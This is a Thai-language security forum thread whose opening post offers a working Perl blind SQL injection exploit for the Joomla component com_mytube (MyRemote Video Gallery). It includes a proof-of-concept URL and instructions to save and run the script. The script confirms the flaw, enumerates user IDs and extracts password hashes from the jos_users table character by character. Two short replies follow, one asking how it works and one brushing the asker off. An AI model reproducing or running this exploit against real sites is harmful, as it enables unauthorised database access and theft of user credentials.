Results 1 to 3 of 3

Thread: เจาะ component joomla ชื่อ Mytube : Blind SQL Injection Exploit

  1. #1
    Senior Member rev0lut1on's Avatar
    Join Date
    Dec 2008
    Posts
    110


    Thumbs down

    ชื่อโปรแกรม : MyRemote Video Gallery
    version : 1.0 Beta
    ผู้สร้าง : Jomtube Team
    License : GPL type : Non-Commercial
    วันที่ : Aug 24, 2009
    ดาวน์โหลด : http://joomlacode.org/gf/download/frsrelea..._2009.08.02.zip

    #I.Blind SQL injection (user_id)
    #Poc/Exploit:
    #~~~~~~~~~~~
    #http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
    #X: Valid User_id

    #+++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    #+++++++++++++++++++++++++++++++++++++++

    บันทึก Code Perl ด้านล่างนี้แล้วแก้ไขให้เรียบร้อยแล้วเซฟเป็น .pl แล้วนำไปรันใน CMD [ควรมีตัว Runtime ก่อน เช่น Active Perl]

    [hide=5]
    Code:
    use LWP::UserAgent;
    use Benchmark;
    my $t1 = new Benchmark;
    
    system ('cls');
    print "\n\n";
    print "\t\t[+] ---------------------------------[+]\n";
    print "\t\t|          |  Chip d3 Bi0s |          |\n";
    print "\t\t|        MyRemote Video Gallery Bsql  | \n";
    print "\t\t|joomla component com_mytube (user_id)| \n";
    print "\t\t[+]----------------------------------[+]\n\n";
    
    
    print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>);
    
    $w="Total Videos In Category";
    $column_name="concat(password)";
    $table_name="jos_users";
    
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    
    print "----------------Inyectando----------------\n";
    
    
      $host = $target . "+and+1=1&option=com_mytube&Itemid=null";
      my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;
      if ($content =~ /$regexp/) {
    
    $host = $target . "+and+1=2&option=com_mytube&Itemid=null";
      my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;
      if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}
    
    else
    
    {print " [-] Vulnerable :)\n";
    
    $d=0;
    
    
    for ($idusuario=62;$idusuario<=80;$idusuario++) 
    
    {
                        
     $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
     my $res = $b->request(HTTP::Request->new(GET=>$host));
     my $content = $res->content;
     my $regexp = $w;
     if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}
    
     }
    
     print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";
    
    print  " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>);
    
    for ($x=1;$x<=32;$x++) 
    	{
    
      $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
      my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;
      print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}
      if ($content =~ /$regexp/)
      {
      
              for ($c=97;$c<=102;$c++) 
    
    {
     $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
     my $res = $b->request(HTTP::Request->new(GET=>$host));
     my $content = $res->content;
     my $regexp = $w;
    
    
     if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
     }
    
    
      }
    else
    {
    
    for ($c=48;$c<=57;$c++) 
    
    {
     $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
     my $res = $b->request(HTTP::Request->new(GET=>$host));
     my $content = $res->content;
     my $regexp = $w;
    
     if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
     }
    
    
    }
    	}
    
    print " [+] Password   :"." ".join('', @caracter) . "\n";
    
    my $t2 = new Benchmark;
    my $tt = timediff($t2, $t1);
    print "El script tomo:",timestr($tt),"\n";
    
    }
    }
    else
    {print " [-] Exploit Fallo :(\n";}
    Last edited by rev0lut1on; 13-07-2010 at 10:56 AM.
    CITEC Club - CITEC The Largest Computer Security Community

  2. #2
    Junior Member
    Join Date
    Jul 2010
    Posts
    11


    ขอบคุณครับ สำหรับข้อมูลดีๆ พอดีสนใจเรื่องนี้มาก

    เเล้วมันจะเจาะ อย่างไร ครับ ผมไม่เข้าใจวิธีการทำงานของ มันเลยอยากถามหน่อยครับ

  3. #3


    ผมคิดว่าคุณควรมีความรู้พื้นฐานให้แน่นก่อนจะดีมั้ยครับ เห้นถามทุกกระทู้เลย

    อธิบาย ๆ ง่าย ๆ ว่าเป็น paper exploit ของ cms MyRemote Video Gallery ซึ่งใช้บัค Sqli

    สังเกตได้ว่าใช้ perl ครับ แค่นั้นแหละ

    คุณยังดูไม่่ออกเลยว่าอันไหนใช้ทำอะไร ผมคิดว่าคุณควรศึกษาด้วยตัวเองก่อนจะตั้งคำถามนะครับ

Similar Threads

  1. Replies: 0
    Last Post: 09-06-2010, 09:43 PM
  2. Replies: 0
    Last Post: 09-06-2010, 09:43 PM
  3. Joomla Component rsmonials Remote XSS exploit
    By WC_{Sky} in forum Exploits
    Replies: 0
    Last Post: 23-04-2009, 09:07 AM
  4. Joomla Component com_alphacontent SQL Injection
    By nprotech in forum Hacking, Exploit Articles/Tutorial/Techniques
    Replies: 0
    Last Post: 26-03-2008, 04:39 PM
  5. Replies: 0
    Last Post: 23-03-2008, 11:26 PM

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •